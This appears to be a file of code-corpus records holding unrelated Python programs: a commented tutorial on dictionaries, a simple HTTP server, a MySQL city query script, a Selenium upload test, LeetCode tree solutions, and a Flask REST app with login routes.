\"\", item)\n    if len(line) > 0:\n        clause_text += line + \"\\n\"\n#\n#\nprint(clause_text)","sub_path":"爬虫/selenium爬虫.py","file_name":"selenium爬虫.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"57358318","text":"# https://towardsdatascience.com/15-things-you-should-know-about-dictionaries-in-python-44c55e75405c\n''' 1. What is a Python dictionary?\nA dictionary is an unordered and mutable Python container that stores mappings of unique keys to values. Dictionaries are written with curly brackets ({}), including key-value pairs separated by commas (,). A colon (:) separates each key from its value.\nThree dictionaries are shown below, containing the population of the 5 largest German cities, a list of products, and students’ grades.\n'''\n# dictionary containing the population of the 5 largest german cities\npopulation = {'Berlin': 3748148, 'Hamburg': 1822445, 'Munich': 1471508, 'Cologne': 1085664, 'Frankfurt': 753056}\n\n# dictionary containing a list of products' prices\nproducts = {'table': 120, 'chair': 40, 'lamp': 14, 'bed': 250, 'mattress': 100}\n\n# dictionary containing students grades\ngrades = {'Alba': 9.5, 'Eduardo': 10, 'Normando': 3.5, 'Helena': 6.5, 'Claudia': 7.5}\n\n'''\n2. Create a dictionary with dict() constructor\nDictionaries can also be created with the built-in function dict(**kwarg). This function takes an arbitrary number of keyword arguments (arguments preceded by an identifier kwarg=value) as input and returns a new dictionary.\nWe can also create a dictionary using another dictionary in combination with keyword arguments (dict(mapping, **kwarg)) as follows:\nAlternatively, we can construct a dictionary using an iterable (e.g. list of tuples). Each tuple must contain two objects. The first object becomes the key and the second becomes the value of the dictionary.\n'''\n# create a dictionary with the dict() function using keyword arguments. # Note: the input is not given in dictionary format; the dict constructor builds the dictionary from the keyword arguments.\n# dictionary - ages of students\nstudents_ages = dict(Amanda=27, Teresa=38, Paula=17, Mario=40)\n\n# create a dictionary with the dict() function using another dictionary plus keyword arguments\n# dictionary - ages of students\nstudents_ages = dict({'Amanda':27,'Teresa':38},Paula=18,Mario=40) #Note: the quoted keys belong to the dict passed as positional argument, while the rest are keyword arguments; 
see args&kwargs.py for more details on **kwargs.\nprint(students_ages)\n\n# create a dictionary with the dict() function using an iterable (list of tuples). # The [] inside dict() is required; otherwise we get an error (dict expected at most 1 arguments, got 4) because dict treats every tuple as a separate argument while it expects a single iterable.\n# dictionary - ages of students\nstudents_ages = dict([('Amanda', 27), ('Teresa', 38), ('Paula', 17), ('Mario', 40)])\nprint(students_ages)\n\n#Lastly, we can create a dictionary using two lists. First, we have to build an iterator of tuples using the zip(*iterables) function. Then, we employ the dict([iterable, **kwarg]) function to construct the dictionary, as we did previously.\nstudents = ['Amanda', 'Teresa', 'Paula', 'Mario']\nages = [27, 38, 17, 40]\ns = dict(zip(students,ages))\n\n'''\n#Access values in a dictionary\n#To access dictionary values, we cannot use a numeric index (as we do with lists or tuples), since dictionaries are unordered containers. Instead, we enclose the key using square brackets ([]). If we try to access a value using an undefined key, a KeyError is raised.\n#To avoid getting an exception with undefined keys, we can use the method dict.get(key[, default]). This method returns the value for key if key is in the dictionary, else returns default. If default is not provided, it returns None (but never raises an exception).\n'''\n# access population\npopulation['Munich']\n# 1471508\n\n# # access a value using a numeric index\n# population[1]\n# # KeyError\n\n# # access population of Stuttgart\n# population['Stuttgart']\n# # KeyError\n\n# access population of Munich using the .get() method without a default value\nprint(population.get('Munich'))\n# 1471508\n\n# access population of Stuttgart using the .get() method without a default value\nprint(population.get('Stuttgart'))\n# None\n\n# access population of Stuttgart using the .get() method with a default value\nprint(population.get('Stuttgart', 'Not found'))\n# Not found\n\n#Inserting elements\n#To insert an element in a dictionary, we can use square brackets as follows:\nproducts['pillow'] = 10\nprint(products)\n\n#To insert multiple items at once, we can use dict.update([other]). This method updates key-value pairs from other, overwriting existing keys.\n## add shelf and sofa to the products dictionary using another dictionary object\nproducts.update({'shelf':70,'sofa':300})\nprint(products)\n\n## add three new items to the grades dictionary using keyword arguments\ngrades.update(Violeta=5.5, Marco=6.5, Paola=8)\nprint(grades)\n\n## add two cities to the population dictionary using a list of tuples\npopulation.update([('Stuttgart', 632743),('Dusseldorf', 617280)])\nprint(population)\n#As shown above, the .update() method accepts as an argument not only another dictionary, but also a list of tuples or keyword arguments. This method modifies the dictionary in-place, returning None.\n\n\n##5. Change elements in a dictionary\n#We can change the value of an item by accessing the key using square brackets ([]). To modify multiple values at once, we can use the .update() method, since this function overwrites existing keys.\n# Subsequently, we increase the price of the sofa by 100 units, and we modify the grades of two students.\nprint(products)\nproducts['sofa'] = 400\n\nprint(products)\n#{'table': 120, 'chair': 40, 'lamp': 14, 'bed': 250, 'mattress': 100, 'pillow': 10, 'shelf': 70, 'sofa': 400}\n\n# modify the grades of two students\ngrades.update({'Normando':2.5,'Violeta':6})\nprint(grades)\n\n
#6. Remove elements in a dictionary\n#To remove an element in a dictionary, we can use either the del dict[key] keyword or the dict.pop(key[, default]) method.\n#The del dict[key] keyword removes the given element from the dictionary, raising a KeyError if key does not exist.\nprint(population)\n#{'Berlin': 3748148, 'Hamburg': 1822445, 'Munich': 1471508, 'Cologne': 1085664, 'Frankfurt': 753056, 'Stuttgart': 632743,\n# 'Dusseldorf': 617280}\n# del population['Ingolstadt'] #KeyError: 'Ingolstadt'\n\n# key exists\n# the element Dusseldorf is removed\ndel population['Dusseldorf']\n\n# key exists - the item is removed and the value returned\npopulation.pop('Stuttgart')\n# 632743 - returned value\n\n#If key exists in the dictionary, the dict.pop(key[, default]) method removes the item with the given key from the dictionary and returns its value. On the contrary, if key does not exist in the dictionary, the method returns the default value. If no default value is provided and key does not exist, the .pop() method will raise an exception (KeyError).\n\nprint(population)\n#{'Berlin': 3748148, 'Hamburg': 1822445, 'Munich': 1471508, 'Cologne': 1085664, 'Frankfurt': 753056}\n\n# key does not exist but a default value is provided\npopulation.pop('Ingolstadt', 'Value not found')\n# 'Value not found' - returned value\n\n# # key does not exist and a default value is NOT provided\n# population.pop('Garching')\n# # KeyError\n\n'''\n##7. Check if a key exists\n# To check whether a key exists in a dictionary, we have to use a membership operator. Membership operators are used to test whether a value is found in a sequence (e.g. strings, lists, tuples, sets, or dictionaries). There are two membership operators, as explained below.\n# in → Evaluates to true if the object on the left side is included in the object on the right side.\n# not in → Evaluates to true if the object on the left side is not included in the object on the right side.\n'''\nprint('Berlin' in population)\nprint('Ingolstadt' not in population)\n#As shown above, membership operators (in and not in) can be used to check whether a key exists in a dictionary, but they can also be used with other sequences in the following manner.\n\n# membership operators - in / not in\n#strings\nprint('a' in 'Amanda')\n\n#lists\nprint(3 in [1,2,3,4])\n\n#tuples\nprint(5 not in (1, 2))\n\n#sets\nprint('Valencia' in {'Barcelona', 'Valencia', 'Madrid','Berlin'})\n
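#One detail worth noting (added illustration, reusing the population dict defined above): on a dictionary, in and not in test the KEYS only; to test whether a value occurs, check the .values() view explicitly.\nprint(3748148 in population)\n# False - 3748148 is a value, not a key\nprint(3748148 in population.values())\n# True\n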
\n#8. Copy a dictionary\n#To copy a dictionary, we can simply use the dict.copy() method. This method returns a shallow copy of the dictionary. We have to be careful with shallow copies, since if your dictionary contains other container objects like lists, tuples, or sets, they will be referenced and not duplicated.\n\n# dictionary with students' heights\nstudents = {'Marco': 173, 'Luis': 184, 'Andrea': 168}\n\n# create a shallow copy\nstudents_2 = students.copy()\n\n# modify the height of Luis in the shallow copy\nstudents_2['Luis'] = 180\n\n# the modification in students_2 is not observed in students since 180 is an int\nprint(students)\n# {'Marco': 173, 'Luis': 184, 'Andrea': 168}\n\nprint(students_2)\n# {'Marco': 173, 'Luis': 180, 'Andrea': 168}\n\n\n# dictionary with students' heights and weights\nstudents_weights = {'Marco': [173, 70], 'Luis': [184, 80], 'Andrea': [168, 57]}\n\n# create a shallow copy\nstudents_weights_2 = students_weights.copy()\n\n# modify the height of Luis in the shallow copy\nstudents_weights_2['Luis'][0] = 180\n# the modification in students_weights_2 is observed in students_weights\n# since the list containing the weight and height is referenced and not duplicated\nprint(students_weights)\n# {'Marco': [173, 70], 'Luis': [180, 80], 'Andrea': [168, 57]}\n\n# solution --> create a deepcopy of the dictionary\n\n#To avoid this problem, we can create a deep copy using the copy.deepcopy(x) function (defined in the copy module) as follows:\n\nimport copy\nstudents_weights_2 = copy.deepcopy(students_weights)\nstudents_weights_2['Luis'][0] = 174\n# the modification in students_weights_2 is NOT observed in students_weights\n# since we are working with a deep copy\n\nprint(students_weights)\n# {'Marco': [173, 70], 'Luis': [180, 80], 'Andrea': [168, 57]}\n\nprint(students_weights_2)\n# {'Marco': [173, 70], 'Luis': [174, 80], 'Andrea': [168, 57]}\n\n'''\n##The difference between shallow copies and deep copies is only relevant when the dictionary contains other objects like lists, since those objects will be referenced instead of duplicated (shallow copy). To create a fully independent clone of the original dictionary, we have to make a deep copy.\n\n#It is important to bear in mind that the = operator does not make a copy of the dictionary. It is just another name to refer to the same dictionary, meaning any modification to the new dictionary is reflected in the original one.\n'''\n\n# dictionary with calories in fruits\nfruits = {'Orange': 50, 'Apple': 65, 'Avocado': 160, 'Pear': 75}\n\n# copy the dictionary using the = operator\nfruits_2 = fruits\n\n# modify fruits_2 (delete one item)\nfruits_2.pop('Orange')\n\n# the modification is reflected in fruits\nprint(fruits)\n# {'Apple': 65, 'Avocado': 160, 'Pear': 75}\n\n#9. Determine the length of the dictionary\n#To determine how many key-value pairs the dictionary contains, we can use the len() function. This function returns the number of items of an object. The input of the function can be a dictionary, but also another type of sequence such as a string, list, tuple, or set.\n\nprint(population)\nprint(len(population))\n\n#10. Loop through a dictionary\n#Iterating through keys\n#To iterate over the keys, we can use the dictionary directly in a for loop as follows:\n\n# iterate through keys\nfor city in population:\n    print(city)\n\n#Alternatively, we can use the dict.keys() method. This method returns a view object, containing the keys of the dictionary.\nfor city in population.keys():\n    print(city)\n'''\n#Iterating through values\n#If you just need to work with the values of a dictionary, then you can use the dict.values() method in a for loop. 
This method returns a view object that contains the values of the dictionary.\n'''\n#We can compute how many people live in the 5 largest German cities using the dict.values() method as follows:\n\ninhabitants = 0\nfor number in population.values():\n    inhabitants += number\nprint(inhabitants)\n\n'''\n#Iterating through items\n#When you’re working with dictionaries, it’s likely that you need to use the keys and the values. To loop through both, you can use the dict.items() method. This method returns a view object, containing key-value pairs as a list of tuples.\n#We can determine the student with the lowest test score using the dict.items() method in combination with a for loop as follows:\n'''\n\n# students grades dictionary\nprint(grades)\n# {'Alba': 9.5, 'Eduardo': 10, 'Normando': 2.5, 'Helena': 6.5, 'Claudia': 7.5, 'Violeta': 6, 'Marco': 6.5, 'Paola': 8}\n\n# dict.items() - dictionary view object containing key-value pairs as a list of tuples\ngrades.items()\n# dict_items([('Alba', 9.5), ('Eduardo', 10), ('Normando', 2.5), ('Helena', 6.5), ('Claudia', 7.5),\n# ('Violeta', 6), ('Marco', 6.5), ('Paola', 8)])\n\n# determine the student with the lowest test score\nmin_grade = 10\nmin_student = ''\nfor student, grade in grades.items():\n    if grade < min_grade:\n        min_student = student\n        min_grade = grade\n\nprint(\"Lowest test score:\", min_student)\n# Normando\n\n'''\n#11. Dictionary comprehensions\nPython for-loops are very handy in dealing with repetitive programming tasks; however, there is another alternative to achieve the same results in a more efficient way: dictionary comprehensions.\nDictionary comprehensions allow the creation of a dictionary using an elegant and simple syntax: {key: value for vars in iterable}. In addition, they are faster than traditional for-loops.\nWe can filter the products with a price lower than 100 euros using both a traditional for-loop and a dictionary comprehension. '''\n\n# list of prices\nprint(products)\n# {'table': 120, 'chair': 40, 'lamp': 14, 'bed': 250, 'mattress': 100, 'pillow': 10, 'shelf': 70, 'sofa': 400}\n\n##########################\n###traditional for loop###\n##########################\n\n# empty dictionary\nproducts_low = {}\n\n# select only the items with a price lower than 100\nfor product, value in products.items():\n    if value < 100:\n        products_low.update({product: value})\n\nprint(products_low)\n# {'chair': 40, 'lamp': 14, 'pillow': 10, 'shelf': 70}\n\n\n##############################\n###dictionary comprehension###\n##############################\n\n# select only the items with a price lower than 100\nproducts_low = {product: value for product, value in products.items() if value < 100}\n\nprint(products_low)\n# {'chair': 40, 'lamp': 14, 'pillow': 10, 'shelf': 70}\n#As we can observe, dictionary comprehensions provide the same results as traditional for-loops in a more elegant way.\n
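#To put a rough number on the speed claim above, here is a small timeit sketch (added as an illustration; absolute timings depend on the machine and Python version):\nimport timeit\n\ndef filter_with_loop():\n    d = {}\n    for product, value in products.items():\n        if value < 100:\n            d[product] = value\n    return d\n\ndef filter_with_comprehension():\n    return {p: v for p, v in products.items() if v < 100}\n\n# timeit.timeit also accepts callables; a higher number gives a more stable measurement\nprint(timeit.timeit(filter_with_loop, number=100000))\nprint(timeit.timeit(filter_with_comprehension, number=100000))\n# the comprehension version typically comes out faster of the two\n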
\n'''\n12. Nested dictionaries\nNested dictionaries are dictionaries that contain other dictionaries. We can create a nested dictionary in the same way we create a normal dictionary, using curly brackets ({}).\nThe following nested dictionary contains information about 5 famous works of art. As we can observe, the values of the dictionary are other dictionaries as well.\n'''\n# nested dictionary containing information about famous works of art\nworks_of_art = {'The_Starry_Night': {'author': 'Van Gogh', 'year': 1889, 'style': 'post-impressionist'},\n                'The_Birth_of_Venus': {'author': 'Sandro Botticelli', 'year': 1480, 'style': 'renaissance'},\n                'Guernica': {'author': 'Pablo Picasso', 'year': 1937, 'style': 'cubist'},\n                'American_Gothic': {'author': 'Grant Wood', 'year': 1930, 'style': 'regionalism'},\n                'The_Kiss': {'author': 'Gustav Klimt', 'year': 1908, 'style': 'art nouveau'}}\nprint(works_of_art)\n#To access elements in a nested dictionary, we specify the keys using multiple square brackets ([]).\n# access elements in a nested dictionary\nworks_of_art['Guernica']['author']\n# 'Pablo Picasso'\n\nworks_of_art['American_Gothic']['style']\n# 'regionalism'\n\n#13. Alternative containers: OrderedDict, defaultdict, and Counter\n'''\nThe collections module provides alternative container datatypes to built-in Python containers. Three dictionary subclasses contained in the collections module that are pretty handy when working with Python are: (1) OrderedDict, (2) defaultdict, and (3) Counter.\nOrderedDict\nOrderedDict consists of a dictionary that remembers the order in which its contents are added. In Python 3.6+ dictionaries are also insertion ordered, meaning they remember the order of items inserted. However, to guarantee element order across other Python versions, we have to use OrderedDict containers.\n'''\n\nimport collections\n\n# create an OrderedDict of chemical elements\ndictionary = collections.OrderedDict({'hydrogen': 1, 'helium': 2, 'carbon': 6, 'oxygen': 8})\n\n# type OrderedDict\nprint(type(dictionary))\n# <class 'collections.OrderedDict'>\n\n# dictionary keys --> .keys() method\nprint(dictionary.keys())\n# odict_keys(['hydrogen', 'helium', 'carbon', 'oxygen'])\n\n# dictionary values --> .values() method\nprint(dictionary.values())\n# odict_values([1, 2, 6, 8])\n\n# insert a new element\ndictionary['nitrogen'] = 7\n\n# nitrogen comes last since it is the last element added\nprint(dictionary)\n# OrderedDict([('hydrogen', 1), ('helium', 2), ('carbon', 6), ('oxygen', 8), ('nitrogen', 7)])\n#As shown above, OrderedDict accepts dictionary methods and functions. Moreover, elements can be inserted, changed, or deleted in the same way as with normal dictionaries.\n
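#One added note on why OrderedDict still matters even on Python versions where plain dicts keep insertion order: equality between two OrderedDicts is order-sensitive, while plain dicts compare order-insensitively.\nod1 = collections.OrderedDict([('a', 1), ('b', 2)])\nod2 = collections.OrderedDict([('b', 2), ('a', 1)])\nprint(od1 == od2)\n# False - same items, different order\nprint(dict(od1) == dict(od2))\n# True - plain dicts ignore order when comparing\n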
\n#defaultdict\n#Defaultdicts are a dictionary subclass that assigns a default value when a key is missing (it has not been set yet). They never raise a KeyError: if we try to access an item that is not available in the dictionary, a new entry is created instead.\n#Defaultdicts take a function as an argument, and initialize the missing key with the value returned by the function. In the example below, the keys are initialized with different values, depending on the function employed as first argument.\n\n\nimport collections\nimport numpy as np\n\n# missing key initialized with a 0\ndefault_1 = collections.defaultdict(int)\n\ndefault_1['missing_entry']\nprint(default_1)\n# defaultdict(<class 'int'>, {'missing_entry': 0})\n\n# missing key initialized with an empty list\ndefault_2 = collections.defaultdict(list, {'a': 1, 'b': 2})\n\ndefault_2['missing_entry']\nprint(default_2)\n# defaultdict(<class 'list'>, {'a': 1, 'b': 2, 'missing_entry': []})\n\n# missing key initialized with a string\ndefault_3 = collections.defaultdict(lambda : 'Not given', a=1, b=2)\n\ndefault_3['missing_entry']\nprint(default_3)\n# defaultdict(<function <lambda> at 0x000001DEF6ADF730>, {'a': 1, 'b': 2, 'missing_entry': 'Not given'})\n\n# missing key initialized with a numpy array\ndefault_4 = collections.defaultdict(lambda: np.zeros(2))\n\ndefault_4['missing_entry']\nprint(default_4)\n# defaultdict(<function <lambda> at 0x000001DEF6ADF950>, {'missing_entry': array([0., 0.])})\n#As we can observe, we can pass a dictionary or keywords as second argument (optional) to initialize the defaultdict container.\n\n\n#Counter\n#A Counter is a dictionary subclass for counting hashable objects. The function returns a Counter object, where elements are stored as keys and their counts are stored as values. Using this function, we can easily count the elements of a list, as shown below.\n\nletters = ['a','b','c','a','b','e','d']\n\ncounter = collections.Counter(letters)\nprint(counter)\nprint(counter.most_common(3))\n#As shown above, we can easily obtain the most frequent elements with the .most_common([n]) method. This method returns a list of the n most common elements and their counts.\n
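#A classic pattern for the defaultdict(list) variant shown in the section above (a short added illustration): grouping items without pre-creating the lists.\nwords = ['apple', 'avocado', 'banana', 'blueberry', 'cherry']\ngrouped = collections.defaultdict(list)\nfor word in words:\n    grouped[word[0]].append(word)\nprint(dict(grouped))\n# {'a': ['apple', 'avocado'], 'b': ['banana', 'blueberry'], 'c': ['cherry']}\n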
\n#14. Create a Pandas DataFrame from a dictionary.\n#A Pandas DataFrame is two-dimensional tabular data where each row represents an observation and each column a variable. A Pandas DataFrame can be created using the pandas.DataFrame constructor. This function accepts as input various python containers (e.g. lists, dictionaries, or numpy arrays). However, in this article, we explain only the ways to create a DataFrame that involve the use of dictionaries.\n#Create a DataFrame from a dictionary\n#We can create a DataFrame from a dictionary, where the keys represent column names, and the values represent column data, in the following manner:\n\nimport pandas as pd\n\n# create a Pandas DataFrame from a dictionary - keys (column name) - value (column data)\ndf = pd.DataFrame({'name': ['Mario', 'Violeta', 'Paula'],\n                   'age': [22, 27, 19],\n                   'grades': [9, 8.5, 7]})\nprint(df)\n#As we can observe, the default index is just the row number (an integer index beginning at 0). We can modify these indexes by passing the index list to the DataFrame constructor.\n\ndf_index = pd.DataFrame({'name': ['Mario', 'Violeta', 'Paula'],\n                         'age': [22, 27, 19],\n                         'grades': [9, 8.5, 7]}, index=['student_1','student_2','student_3'])\n\nprint(df_index)\n\n#Create a DataFrame from a list of dictionaries\n#A list of dictionaries can also be used to create a DataFrame, where the keys represent column names. As before, we can change indexes by passing the index list to the DataFrame function.\n# create a Pandas DataFrame from a list of dictionaries - keys (column name) - with custom indexes\ndf_2 = pd.DataFrame([{'name': 'Mario', 'age': 22, 'grades':9},\n                     {'name': 'Violeta', 'age': 27, 'grades':8.5},\n                     {'name': 'Paula', 'age': 19, 'grades':7}], index=['student_1', 'student_2', 'student_3'])\n\nprint(df_2)","sub_path":"towardsdatascience_dictionaries.py","file_name":"towardsdatascience_dictionaries.py","file_ext":"py","file_size_in_byte":22027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"580697267","text":"#!/usr/bin/env python\n\nimport BaseHTTPServer\nimport logging\nimport optparse\nimport sys\n\nimport pages\n\nclass TibstatsHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):\n\n    def do_GET(self):\n        self.process_request()\n\n    def do_POST(self):\n        self.process_request()\n\n    def do_HEAD(self):\n        self.send_error(418, \"Short and stout\")\n\n    def process_request(self):\n        pages.handle_http_request(self)\n\n    # maybe want to hook the internal request logging mechanism?\n    #def log_message(self, format, *posargs):\n    #    logging.info(format, *posargs)\n\ndef main():\n    parser = optparse.OptionParser()\n    parser.add_option(\"-p\", \"--port\", type=\"int\", default=17091)\n    opts, args = parser.parse_args()\n    logging.basicConfig(level=logging.DEBUG)\n    server_class = BaseHTTPServer.HTTPServer\n    handler_class = TibstatsHTTPRequestHandler\n    server_address = (\"\", opts.port)\n    logging.info(\"Starting server on %s\", server_address)\n    httpd = server_class(server_address, handler_class)\n    httpd.serve_forever()\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"projects/tibstat/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"440862144","text":"import numpy as np\n\nN = 4\nM = 5\n\nA = np.random.randint(low=-9, high=10, size=(N, M))\nprint(\"Матрица:\\r\\n{}\\n\".format(A))\n\nSum = A.sum()\nprint(\"Сумма элементов всей матрицы: \" + str(Sum) + \"\\n\")\nSum_column = A.sum(axis=1)\nX = []\nfor i in range(0, N):\n    n = Sum_column[i] / Sum\n    X.append(n)\nX = np.array(X)[: , np.newaxis]\nA = np.hstack((A, X))\n\nprint(A)\n","sub_path":"2 часть курсовой/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"377571934","text":"# Second program\n\nfrom matplotlib import pyplot\nfrom openpyxl import load_workbook\n\ndef getvalue(x):\n    return x.value\n\nwb = load_workbook('data_analysis_lab.xlsx')\n\nlict = wb['Data']\n\nyears = list(map(getvalue, lict['A'][1:]))\nrelative_temp = list(map(getvalue, lict['C'][1:]))\nactivity = list(map(getvalue, lict['D'][1:]))\n\npyplot.plot(years, relative_temp, label=\"Относительная температура\")\npyplot.plot(years, activity, label=\"Солнечная активность\")\n\npyplot.xlabel('Год')\npyplot.ylabel('Температура/Солнечная активность')\npyplot.legend(loc='best')\n\npyplot.show()","sub_path":"Lab1.2/SecondLab.py","file_name":"SecondLab.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"171196177","text":"class TreeNode(object):\n    def __init__(self, val=0, left=None, right=None):\n        self.val = val\n        self.left = left\n        self.right = right\n\n    def rightSideView(self, root):\n        if not root:\n            
return []\n        queue = []\n        queue.append(root)\n        result = []\n\n        while queue:\n            size = len(queue)\n            for i in range(size):\n                node = queue[0]\n                queue = queue[1:]\n                if node.left:\n                    queue.append(node.left)\n                if node.right:\n                    queue.append(node.right)\n                # only the last node of each level is visible from the right side\n                if i == size - 1:\n                    result.append(node.val)\n\n        return result","sub_path":"2021-02-02_DFS-BFS/199_BinaryTreeRightSideView.py","file_name":"199_BinaryTreeRightSideView.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"102472638","text":"#!/usr/bin/python3\n\"\"\"Conn module\"\"\"\nimport MySQLdb\nfrom sys import argv\n\nif __name__ == '__main__':\n    myU = argv[1]\n    myP = argv[2]\n    myDB = argv[3]\n    sName = argv[4]\n    myH = \"localhost\"\n    db = MySQLdb.connect(host=myH, port=3306, user=myU, passwd=myP, db=myDB)\n    cur = db.cursor()\n    myQ = \"SELECT c.name FROM cities AS c, states AS s \"\n    myQ += \"WHERE s.name = %s AND s.id = c.state_id ORDER BY c.id;\"\n    cur.execute(myQ, (sName,))\n    result = cur.fetchall()\n    if (len(result) != 0):\n        for row in result:\n            for col in row:\n                if (result.index(row) == len(result) - 1):\n                    print(col)\n                else:\n                    print(col, end=', ')\n    else:\n        print()\n    cur.close()\n    db.close()\n","sub_path":"0x0F-python-object_relational_mapping/5-filter_cities.py","file_name":"5-filter_cities.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"465565935","text":"# Definition for a binary tree node.\n# class TreeNode:\n#     def __init__(self, x):\n#         self.val = x\n#         self.left = None\n#         self.right = None\n\nclass Solution:\n    # @param {TreeNode} root\n    # @return {string[]}\n    def binaryTreePaths(self, root):\n        \n        if root is None: return []\n        \n        def allBinaryTreePaths(currPath, pathSets, currNode):\n            if currNode.left is None and currNode.right is None:\n                pathSets.append(currPath)\n            else:\n                if currNode.left:\n                    allBinaryTreePaths(currPath + '->' + str(currNode.left.val), pathSets, currNode.left)\n                if currNode.right:\n                    allBinaryTreePaths(currPath + '->' + str(currNode.right.val), pathSets, currNode.right)\n        \n        pathSets = []\n        allBinaryTreePaths(str(root.val), pathSets, root)\n        return pathSets","sub_path":"257-Binary-Tree-Paths/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"316298554","text":"import unittest\nimport config\nimport os\nimport time\nfrom LoginMain import UserLogin\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as ec\n\n\nclass DocumentUpload(unittest.TestCase):\n    def setUp(self):\n        self.login = UserLogin().__int__()\n        self.login.signin.click()\n        start_translate = WebDriverWait(self.login.driver, 20) \\\n            .until(lambda driver: driver.find_element_by_id(\"start-translate\"))\n        start_translate.click()\n        self.source_lang = self.login.driver.find_element_by_id(\"source-lang\")\n        self.target_lang = self.login.driver.find_element_by_id(\"target-lang\")\n        self.upload = self.login.driver.find_element_by_id(\"upload\")\n        self.back = self.login.driver.find_element_by_id(\"back\")\n        self.file_upload = self.login.driver.find_element_by_xpath(\"//input[@type='file']\")\n        time.sleep(3)\n\n    def test1_upload_document(self):\n        try:\n            driver = self.login.driver\n            self.source_lang.click()\n            source_english = WebDriverWait(driver, 20).until(lambda d: d.find_element_by_id(\"English\"))\n            
source_english.click()\n self.target_lang.click()\n target_hindi = WebDriverWait(driver, 20).until(lambda d: d.find_element_by_id(\"Hindi\"))\n target_hindi.click()\n time.sleep(2)\n self.file_upload.send_keys(\"/home/roshan/Downloads/2c6d61e3-3a84-4f37-814e-d20f2073a05f.pdf\")\n time.sleep(5)\n self.upload.click()\n result = WebDriverWait(driver, 20).until(lambda d: d.current_url == config.view_document_url)\n time.sleep(5)\n if result:\n print(\n f'=HYPERLINK(\"{config.hyperlink_pretext}{os.path.basename(__file__)}\";\"test1_upload_document\"),PASSED')\n except Exception:\n print(\n f'=HYPERLINK(\"{config.hyperlink_pretext}{os.path.basename(__file__)}\";\"test1_upload_document\"),FAILED')\n finally:\n driver.quit()\n\n def test2_click_on_back_button(self):\n try:\n driver = self.login.driver\n self.back.click()\n result = WebDriverWait(driver, 20).until(lambda d: d.current_url == config.view_document_url)\n time.sleep(5)\n if result:\n print(\n f'=HYPERLINK(\"{config.hyperlink_pretext}{os.path.basename(__file__)}\";\"test2_click_on_back_button\"),PASSED')\n except Exception:\n print(\n f'=HYPERLINK(\"{config.hyperlink_pretext}{os.path.basename(__file__)}\";\"test2_click_on_back_button\"),FAILED')\n finally:\n driver.quit()\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test/DocumentUpload.py","file_name":"DocumentUpload.py","file_ext":"py","file_size_in_byte":2759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"574538046","text":"from flask import Flask, jsonify, request, send_file, send_from_directory, flash, render_template, url_for, redirect\nfrom flask_restful import Api\n\nfrom flask_login import LoginManager, login_user, logout_user, login_required, current_user\n\nfrom db import db\nfrom blacklist import BLACKLIST\nfrom resources.user import User, UserLogin\nfrom resources.wordpress import Wordpress, WordpressList\nfrom resources.wordpressCust import WordpressCust, WordpressListCust\nfrom resources.store import Store, StoreList\nfrom resources.accessiDb import Db, DbList\nfrom resources.cPanel import Cpanel, CpanelList\nfrom resources.ftp import Ftp, FtpList\nfrom resources.plugin import Plugin, PluginList\nfrom models.user import UserModel\n\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///data.db'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True\napp.config['PROPAGATE_EXCEPTIONS'] = True\n# enable blacklist feature\n# allow blacklisting for access and refresh tokens\n\napp.secret_key = 'jose' # could do app.config['JWT_SECRET_KEY'] if we prefer\n# Configure application to store JWTs in cookies. 
Whenever you make\n# a request to a protected endpoint, you will need to send in the\n# access or refresh JWT via a cookie.\n\napi = Api(app)\nlogin_manager = LoginManager(app)\ndb.init_app(app)\n\n\n@app.before_first_request\ndef create_tables():\n    db.create_all()\n\n\n@login_manager.user_loader\ndef load_user(user_id):\n    return UserModel.query.get(int(user_id))\n\n\napi.add_resource(Store, '/store/')\napi.add_resource(StoreList, '/stores')\n# wordpress\napi.add_resource(Wordpress, '/wordpress/')\napi.add_resource(WordpressList, '/wordpress')\n# wordpress User\napi.add_resource(WordpressCust, '/wordpress-cust/')\napi.add_resource(WordpressListCust, '/wordpress-cust')\n# database\napi.add_resource(Db, '/db/')\napi.add_resource(DbList, '/db')\n# cPanel\napi.add_resource(Cpanel, '/cpanel/')\napi.add_resource(CpanelList, '/cpanel')\n# ftp\napi.add_resource(Ftp, '/ftp/')\napi.add_resource(FtpList, '/ftp')\n# plugin\napi.add_resource(Plugin, '/plugin/')\napi.add_resource(PluginList, '/plugin')\n\n\n# api.add_resource(UserRegister, '/register')\napi.add_resource(User, '/user/')\napi.add_resource(UserLogin, '/api/login')\n\n\n#------------------Login Form---------------#\n\n\n@app.route('/')\n@login_required\ndef finder():\n    return render_template('build/index.html')\n\n\n# a second view cannot also be mapped to '/', so the login page gets its own route\n@app.route('/login')\ndef login():\n    return render_template('build/index.html')\n\n\n@app.route('/logout')\n@login_required\ndef logout():\n    logout_user()\n    return 'Logout completed'\n\n\nif __name__ == '__main__':\n\n    login_manager.init_app(app)\n\n    app.run(port=5000, debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 